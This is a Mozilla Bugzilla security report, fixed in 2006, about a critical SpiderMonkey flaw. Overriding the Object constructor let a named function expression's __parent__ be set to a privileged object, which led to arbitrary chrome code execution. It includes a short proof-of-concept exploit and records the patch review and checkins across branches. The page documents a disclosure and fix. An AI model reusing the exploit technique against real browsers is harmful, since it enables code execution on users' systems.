Closed Bug 340727 Opened 19 years ago Closed 19 years ago

Arbitrary code execution by setting fun.__parent__ to a privileged object

Categories

(Core :: Security, defect, P2)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla1.9alpha1

People

(Reporter: moz_bug_r_a4, Assigned: mrbkap)

Details

(Keywords: fixed1.8.1, verified1.8.0.5, Whiteboard: [sg:critical])

Attachments

(3 files)

testcase
398 bytes, text/html
Details
Fix
1.29 KB, patch
igor
: review+
shaver
: superreview+
jay
: approval1.8.0.5+
Details | Diff | Splinter Review
for 1.0.x
849 bytes, patch
Details | Diff | Splinter Review
A named function created by function expression has a extra parent object that has a property whose name is the function name. a = function b() {}; a.__parent__.toSource(); -> ({b:(function b() {})}) There is a way to set the parent object in question to a privileged object. (I got the hint from Bug 338709.) Object = function() { return privileged_object; }; a = function b() {}; Exploit: <marquee id="m"> x = m.init.eval.prototype; x.w = window; Object = function() { return x; }; var a = function b() { with (w) alert(Components.stack); }; a.call({}); // to avoid the access check in js_ComputeThis.
Attached file testcase
Attached patch FixSplinter Review
If anybody's relying on this behavior already, then, IMO, they'll get what they deserve.
Assignee: dveditz → mrbkap
Status: NEW → ASSIGNED
Attachment #224775 - Flags: superreview?(shaver)
OS: Windows XP → All
Priority: -- → P2
Hardware: PC → All
Target Milestone: --- → mozilla1.9alpha
Attachment #224775 - Flags: review?(igor.bukanov)
Comment on attachment 224775 [details] [diff] [review] Fix sr=shaver
Attachment #224775 - Flags: superreview?(shaver) → superreview+
Comment on attachment 224775 [details] [diff] [review] Fix This is an area where as I remember Rhino deviates from SpiderMonkey quite significantly. For named function expressions Rhino parser simply adds a variable initialized to the function itself avoiding an extra objects. It violates Ecma v3 since potentially user-visible new Object is not called. But this is really the case of broken specs.
Attachment #224775 - Flags: review?(igor.bukanov) → review+
Fix checked into trunk.
Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED
(In reply to comment #4) > (From update of attachment 224775 [details] [diff] [review] [edit]) > This is an area where as I remember Rhino deviates from SpiderMonkey quite > significantly. For named function expressions Rhino parser simply adds a > variable initialized to the function itself avoiding an extra objects. It > violates Ecma v3 since potentially user-visible new Object is not called. But > this is really the case of broken specs. Yes, here and in catch clause case, ECMA-262 goes off the rails. It often (but not consistently) uses an internal constructor function that magically uses the "original Object.prototype value" as the prototype of the new object, and does not invoke the constructor function by its name. For ES4, both cases should use lexical scope. /be
Flags: blocking1.8.1?
Flags: blocking1.8.0.5?
Flags: blocking1.7.14?
Flags: blocking-aviary1.0.9?
Whiteboard: [sg:critical]
Flags: blocking1.8.0.5? → blocking1.8.0.5+
Comment on attachment 224775 [details] [diff] [review] Fix a=jay for checkin on the 1.8.0 branch.
Attachment #224775 - Flags: approval1.8.0.5+
Fix checked into the 1.8 branches.
Keywords: fixed1.8.0.5, fixed1.8.1
v.fixed on 1.8.0 branch with Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.5) Gecko/20060619 Firefox/1.5.0.5
Keywords: fixed1.8.0.5verified1.8.0.5
Attached patch for 1.0.xSplinter Review
can't remember if the original applied cleanly. This one does for sure.
Group: core-security
Flags: blocking1.8.1?
Flags: blocking-aviary1.0.9?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: